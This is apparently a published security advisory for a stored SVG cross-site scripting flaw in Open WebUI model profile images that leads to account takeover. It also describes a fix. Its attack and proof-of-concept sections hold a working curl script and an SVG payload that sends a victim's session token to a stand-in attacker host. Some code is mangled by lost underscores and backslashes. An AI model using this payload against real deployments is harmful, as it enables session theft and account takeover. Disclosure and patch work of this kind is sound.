PT-2026-50485 · Pypi · Open-Webui

Published

2026-06-17

·

Updated

2026-06-17

·

CVE-2026-54013

CVSS v3.1

7.6

High

VectorAV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Stored XSS to Account Takeover via Model Profile Images in Open WebUI

Affected: Open WebUI <= 0.9.5 Bypass of: GHSA-3wgj-c2hg-vm6q, GHSA-3856-3vxq-m6fc

TL;DR

Open WebUI patched SVG XSS in user profile images and webhook profile images but forgot to apply the same fix to model profile images. The ModelMeta class has no validate profile image url field validator, and the model image serving endpoint has no MIME allowlist or nosniff header. Any authenticated user with workspace.models permission (enabled by default) can store a data:image/svg+xml;base64,... payload in a model's profile image and achieve full account takeover of anyone who navigates to the image URL.

Past of the issue

In early 2025, two security advisories landed for Open WebUI:
  • GHSA-3wgj-c2hg-vm6q SVG XSS via user profile images
  • GHSA-3856-3vxq-m6fc SVG XSS via webhook profile images
The patches were clean. A validate profile image url function was introduced in backend/open webui/utils/validate.py a compiled regex that restricts data: URIs to safe raster formats (image/png, image/jpeg, image/gif, image/webp), explicitly excluding image/svg+xml because SVG can carry embedded <script> tags. On the output side, users.py added a MIME allowlist check and X-Content-Type-Options: nosniff.
The fix was applied to UserUpdateForm, UpdateProfileForm, and later to ChannelWebhookForm. Three models patched. Case closed.
Except there was a fourth endpoint.

The Gap

Open WebUI has a concept of "Models" user-created model configurations with metadata including a profile image. The metadata lives in ModelMeta:
python
# backend/open webui/models/models.py, line 37-47
class ModelMeta(BaseModel):
  profile image url: Optional[str] = '/static/favicon.png'
  description: Optional[str] = None
  capabilities: Optional[dict] = None
  model config = ConfigDict(extra='allow')
No @field validator. No import of validate profile image url. ModelMeta accepts any string as profile image url including data:image/svg+xml;base64,....
The serving endpoint at GET /api/v1/models/model/profile/image has the same gap:
python
# backend/open webui/routers/models.py, line 503-518
elif profile image url.startswith('data:image'):
  header, base64 data = profile image url.split(',', 1)
  image data = base64.b64decode(base64 data)
  image buffer = io.BytesIO(image data)
  media type = header.split(';')[0].lstrip('data:')

  headers = {'Content-Disposition': 'inline'}
  # ...
  return StreamingResponse(
    image buffer,
    media type=media type,
    headers=headers,
  )
No MIME allowlist. No nosniff. No CSP. The SVG is served inline with Content-Type: image/svg+xml on the application's origin.
Compare this with the patched user endpoint:
python
# backend/open webui/routers/users.py, line 497-509
media type = header.split(';')[0].lstrip('data:').lower()

if media type not in PROFILE IMAGE ALLOWED MIME TYPES:  # <-- ABSENT in models.py
  return FileResponse(f'{STATIC DIR}/user.png')

return StreamingResponse(
  image buffer,
  media type=media type,
  headers={
    'Content-Disposition': 'inline',
    'X-Content-Type-Options': 'nosniff',       # <-- ABSENT in models.py
  },
)
The fix exists. It just was never applied here.

Comparison Table

EndpointInput ValidationMIME AllowlistnosniffStatus
GET /users/{id}/profile/imageYESYESYESPatched
GET /webhooks/{id}/profile/imageYESnonoPartially patched
GET /models/model/profile/imageNONONOVulnerable

Three Write Vectors

The malicious SVG data URI can be injected through any of three endpoints all pass ModelForm containing ModelMeta without validation:
  1. POST /api/v1/models/create (line 195) any user with workspace.models permission
  2. POST /api/v1/models/update (line 581) model owner or admin
  3. POST /api/v1/models/import (line 279) admin only
The workspace.models permission is enabled by default for all non-pending users in a standard deployment.

The Attack

Step 1 Store the payload:
bash
SVG=$(echo '<svg xmlns="http://www.w3.org/2000/svg">
 <script>
  new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")
 </script>
</svg>' | base64 -w0)

curl -s -X POST 'https://TARGET/api/v1/models/create' 
 -H "Authorization: Bearer $ATTACKER TOKEN" 
 -H 'Content-Type: application/json' 
 -d "{
  "id": "gpt-4-turbo-preview",
  "name": "GPT-4 Turbo",
  "base model id": "gpt-4",
  "meta": {
   "profile image url": "data:image/svg+xml;base64,$SVG",
   "description": "Latest GPT-4 Turbo model"
  },
  "params": {},
  "access grants": []
 }"
Step 2 Victim navigates to the image URL:
https://TARGET/api/v1/models/model/profile/image?id=gpt-4-turbo-preview
This happens naturally when a user right-clicks a model's avatar and selects "Open Image in New Tab", or when the attacker sends the URL directly (e.g., in a channel message).
Step 3 Token theft:
The server responds:
http
HTTP/1.1 200 OK
content-type: image/svg+xml
content-disposition: inline

<svg xmlns="http://www.w3.org/2000/svg">
 <script>
  new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")
 </script>
</svg>
No X-Content-Type-Options. No Content-Security-Policy. The browser renders the SVG as a top-level document in the Open WebUI origin. The embedded <script> executes. localStorage.getItem("token") returns the victim's JWT. The attacker receives it and has full API access password changes, admin promotion, data exfiltration.

PoC

bash
#!/usr/bin/env bash
# PoC: Stored SVG XSS -> token theft via Open WebUI model profile image
# Affected: open-webui <= 0.9.5

TARGET="http://localhost:8080"
ATTACKER TOKEN="<attacker JWT from localStorage.token>"
COLLECTOR="https://attacker.example.com/steal"  # attacker-controlled listener

# --- Step 1: Build the malicious SVG (steals victim JWT from localStorage) ---
read -r -d '' SVG <<EOF
<svg xmlns="http://www.w3.org/2000/svg">
 <script>
  new Image().src="${COLLECTOR}?t="+encodeURIComponent(localStorage.getItem("token"));
 </script>
</svg>
EOF
SVG B64=$(printf '%s' "$SVG" | base64 -w0)

# --- Step 2: Store the payload in a model's profile image url ---
curl -s -X POST "${TARGET}/api/v1/models/create" 
 -H "Authorization: Bearer ${ATTACKER TOKEN}" 
 -H "Content-Type: application/json" 
 -d "{
  "id": "gpt-4-turbo-preview",
  "name": "GPT-4 Turbo",
  "base model id": "gpt-4",
  "meta": {
   "profile image url": "data:image/svg+xml;base64,${SVG B64}",
   "description": "Latest GPT-4 Turbo"
  },
  "params": {},
  "access grants": []
 }"

# --- Step 3: Trigger (victim navigates here, or attacker sends the link) ---
echo "Victim opens: ${TARGET}/api/v1/models/model/profile/image?id=gpt-4-turbo-preview"
Expected server response at Step 3 (the proof — SVG served inline, no defenses):
HTTP/1.1 200 OK
content-type: image/svg+xml
content-disposition: inline

<svg xmlns="http://www.w3.org/2000/svg">
 <script>new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")</script>
</svg>
No X-Content-Type-Options, no Content-Security-Policy. The browser renders the SVG as a top-level document, the
Trigger note: because the frontend loads model avatars in <img src=...> context (where SVG scripts do not run), exploitation requires the victim to load the URL as a top-level document — e.g. right-click → "Open image in new tab", or clicking the raw link when the attacker pastes it into a channel/chat. That single click is the only user interaction needed.

Root Cause

An incomplete patch. When GHSA-3wgj-c2hg-vm6q was fixed, the validator was added to UserUpdateForm and UpdateProfileForm. When GHSA-3856-3vxq-m6fc was fixed, it was added to ChannelWebhookForm. But ModelMeta which uses the same profile image url field with the same serving logic was never touched. The output-side defenses (MIME allowlist + nosniff) were also only added to users.py, not to models.py or channels.py.

Recommended Fix

Input side add the validator to ModelMeta:
python
# backend/open webui/models/models.py
from open webui.utils.validate import validate profile image url

class ModelMeta(BaseModel):
  profile image url: Optional[str] = '/static/favicon.png'
  # ...

  @field validator('profile image url', mode='before')
  @classmethod
  def check profile image url(cls, v):
    if v is None:
      return v
    return validate profile image url(v)
Output side add MIME check and nosniff to the serving endpoint:
python
# backend/open webui/routers/models.py
media type = header.split(';')[0].lstrip('data:').lower()

if media type not in PROFILE IMAGE ALLOWED MIME TYPES:
  return FileResponse(f'{STATIC DIR}/favicon.png')

return StreamingResponse(
  image buffer,
  media type=media type,
  headers={
    'Content-Disposition': 'inline',
    'X-Content-Type-Options': 'nosniff',
  },
)
Both layers are necessary input validation prevents storage, output validation prevents serving even if a bypass is found later.

Fix

Improper Encoding or Escaping of Output

Protection Mechanism Failure

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-116CWE-693CWE-79

Related Identifiers

CVE-2026-54013
GHSA-V2QM-5WXJ-QHJ7

Affected Products

Open-Webui